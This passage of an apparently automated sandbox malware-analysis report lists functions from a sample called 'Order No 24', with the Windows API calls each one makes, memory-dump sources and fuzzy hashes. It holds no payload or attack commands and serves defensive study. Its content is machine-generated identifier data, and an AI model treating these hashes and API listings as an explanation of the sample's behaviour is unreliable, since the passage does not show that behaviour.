                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                                  • Opcode ID: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                                                                                                                  • Instruction ID: fe114edb0c7212c1b64062de15b35653a59d4ebb0ffce78ae2fca2dc5745c9e5
                                                                                                                                  • Opcode Fuzzy Hash: 4afe3e877d05d458876924a0d53863a6a47bde03b1785ad6d6539509b9ec7be8
                                                                                                                                  • Instruction Fuzzy Hash: 2DE01A796A0304ABEB20DFF8ED4DF143668B756702F004520B642D50E0CBB64053DF04
                                                                                                                                  Function 009A235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009A2276), ref: 009A2376
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 009A237D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                                  • Opcode ID: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                                                                                                                  • Instruction ID: 31b9492fe64a68ed9a3f67a6d648b239b4c2bfd8f8582445f76cc4c1f0273074
                                                                                                                                  • Opcode Fuzzy Hash: d4fa2c1b40f789918f4d7d1e52db57cdff8346047fbfeb95cf9b8145cb1cd25a
                                                                                                                                  • Instruction Fuzzy Hash: 93E0B679645304ABDB20EFE8ED0DF043A69B767B06F200514F24AD20B0CBBA9412AA14
                                                                                                                                  Function 009FAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                  • Opcode ID: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                                                                                                                  • Instruction ID: f4a3c9752a2ed33c3d2e45aaf1b60b18b767c4cb3c302cc817b0cf72c16a7d33
                                                                                                                                  • Opcode Fuzzy Hash: cf47b7c8850b71984c8208dc4558f1e0605e682226d0e1631fbb6d16299e8778
                                                                                                                                  • Instruction Fuzzy Hash: BBE012F180561CEBCB51D790CD45DFA737CA708741F100892FA8AA1000D63D9B95AB12
                                                                                                                                  Function 009842F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009842EC,?,009842AA,?), ref: 00984304
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984316
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1355242751
                                                                                                                                  • Opcode ID: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                                                                                                                  • Instruction ID: 2804eae11e63a6cdf5dc77719092a106025b2355144583099518b1b6bc138a9c
                                                                                                                                  • Opcode Fuzzy Hash: 2470cb0bfa4cf44240ee35063fbdb34ad2092c20be15bdf1719e93172eabc26a
                                                                                                                                  • Instruction Fuzzy Hash: 2ED0C772544717AFD720AFA5F80D741B6D8BF14711F10895AF555D2264DBB0C8818750
                                                                                                                                  Function 009E2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,009E21FB,?,009E23EF), ref: 009E2213
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 009E2225
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                                  • Opcode ID: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                                                                                                                  • Instruction ID: 5b6b0131e9b847ac79e0afc22dc468d1071ca1c70287b67b847e0e7da384a38e
                                                                                                                                  • Opcode Fuzzy Hash: bebd2bd9204270b25b065af817f4465bf154af1c97a5d6d2e214c5e0dc278e93
                                                                                                                                  • Instruction Fuzzy Hash: F1D0A736800716AFC7269FB1F808601B6DCFB0C301F104819F852E2250DB70DC818760
                                                                                                                                  Function 0098434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,009841BB,00984341,?,0098422F,?,009841BB,?,?,?,?,009839FE,?,00000001), ref: 00984359
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0098436B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-3689287502
                                                                                                                                  • Opcode ID: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                                                                                                                  • Instruction ID: 1835106bd3f34d262edc21a743e2aa2c6a30bf676b9bd655de841806f8e69cbd
                                                                                                                                  • Opcode Fuzzy Hash: e7424bd19ed1623ae404568e21acb9f7f2f15a0b0b6e4c253ec7d3ed0c0694c9
                                                                                                                                  • Instruction Fuzzy Hash: DCD0C772544717BFD720AFF5E809741B6D8BF14715F10496AF496D2250EBB0D8818750
                                                                                                                                  Function 009C0539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,009C051D,?,009C05FE), ref: 009C0547
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 009C0559
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                                  • Opcode ID: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                                                                                                                  • Instruction ID: ab2ddc5efcc148aaaf3d81dce8496a87e0dbcbc065730a65941a9b4adba1653c
                                                                                                                                  • Opcode Fuzzy Hash: 6458ceb70d3b34f95a2982c17773e04369f8bc565a10eeaa9024f042f6864bdf
                                                                                                                                  • Instruction Fuzzy Hash: FFD0C771944716EFD720DFA5E808B41B6E8BB54711F10C91DF596D2250DA70C8818B51
                                                                                                                                  Function 009C0564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,009C052F,?,009C06D7), ref: 009C0572
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 009C0584
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                                  • Opcode ID: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
                                                                                                                                  • Instruction ID: bc152a1b21c30e85adc20d5ef0b8b3af38288bd593f2cbb438ea42f6525110cd
                                                                                                                                  • Opcode Fuzzy Hash: 64076779d19cb1fec165534f10cb28a74b44385baf3fa88851d31c32abc9c983
                                                                                                                                  • Instruction Fuzzy Hash: 35D0C771944716EFDB209FB5E809F42B7E8BB44711F108A1DF855D2150DB70D4C18B61
                                                                                                                                  Function 009DECC8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,009DECBE,?,009DEBBB), ref: 009DECD6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009DECE8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                  • Opcode ID: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
                                                                                                                                  • Instruction ID: 79f04d5133e88eef0bf619b38d07b070cc774b433db98c0ce2f3e3a89bf5662e
                                                                                                                                  • Opcode Fuzzy Hash: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
                                                                                                                                  • Instruction Fuzzy Hash: 2AD0A731450723AFCB20AFF0E848702BAF8BB04300F10C82AF885D2250DF70D8818750
                                                                                                                                  Function 009DBADD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009DBAD3,00000001,009DB6EE,?,00A1DC00), ref: 009DBAEB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009DBAFD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-199464113
                                                                                                                                  • Opcode ID: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
                                                                                                                                  • Instruction ID: c6071d56c58064cc046e6f9f827a2a9f877316d8bad0745fc80a8b09966bd7ea
                                                                                                                                  • Opcode Fuzzy Hash: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
                                                                                                                                  • Instruction Fuzzy Hash: C4D0A731940712EFC7309FA1F849B15B6D8BB05300F11881BF843D2254DB74D881C750
                                                                                                                                  Function 009E3BDB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,009E3BD1,?,009E3E06), ref: 009E3BE9
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009E3BFB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                  • Opcode ID: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
                                                                                                                                  • Instruction ID: 1147cd17505ced4a092d60e47cee39493fb32d1fce30acf73036bf8ec80665f6
                                                                                                                                  • Opcode Fuzzy Hash: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
                                                                                                                                  • Instruction Fuzzy Hash: F0D09EB1500756EBD7219FE5E809642BBA8AB09715F208919E895A2150DBB4DC818E50
                                                                                                                                  Function 009B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
                                                                                                                                  • Instruction ID: abd2eb683633ae745717f86b5aae3eddf91daf31f9b9889e362d515acf801f19
                                                                                                                                  • Opcode Fuzzy Hash: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
                                                                                                                                  • Instruction Fuzzy Hash: 98C15E75A1021AEFCB14CF94C984BEEBBB5FF88710F108598EA45AB291D730DE41DB90
                                                                                                                                  Function 009DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 009DAAB4
                                                                                                                                  • CoUninitialize.OLE32 ref: 009DAABF
                                                                                                                                    • Part of subcall function 009C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 009DAACA
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 009DAD9D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                  • Opcode ID: 0d787d22c1c3a600158fd0009e85a4cc3ff98929816c9b98992f93540d18c270
                                                                                                                                  • Instruction ID: f13202030c8f0b39af16868451bcfc41aeb6256848b6e04319af2b4fc360330a
                                                                                                                                  • Opcode Fuzzy Hash: 0d787d22c1c3a600158fd0009e85a4cc3ff98929816c9b98992f93540d18c270
                                                                                                                                  • Instruction Fuzzy Hash: 2AA16D352447019FCB15EF64C881B2AB7E5BF88720F14884AF9969B3A1CB34FD05CB86
                                                                                                                                  Function 009B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2808897238-0
                                                                                                                                  • Opcode ID: a66ca2640925762ce2d22497b5a565f94486f0f3d8f4b560c450793de41f866c
                                                                                                                                  • Instruction ID: fdcafd98a9254b8c56aa77b9f8c43249c54e9e823eee82da22121c98d32a8112
                                                                                                                                  • Opcode Fuzzy Hash: a66ca2640925762ce2d22497b5a565f94486f0f3d8f4b560c450793de41f866c
                                                                                                                                  • Instruction Fuzzy Hash: 9951BA306247069BDB24AF69D9D5BAEB3E9EF85324F20881FE756C72D1DB349881C701
                                                                                                                                  Function 009A365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3877424927-0
                                                                                                                                  • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                  • Instruction ID: dc2a922bee39842092e4a8102c9dfec1f6aec73142fa64310cad039e5c056384
                                                                                                                                  • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                  • Instruction Fuzzy Hash: 7951A2B0A00305ABDB248FA9888566EB7B9AF42324F24C729F825962D0D775DF508BC0
                                                                                                                                  Function 009EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(01027860,?), ref: 009EC544
                                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 009EC574
                                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 009EC5DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
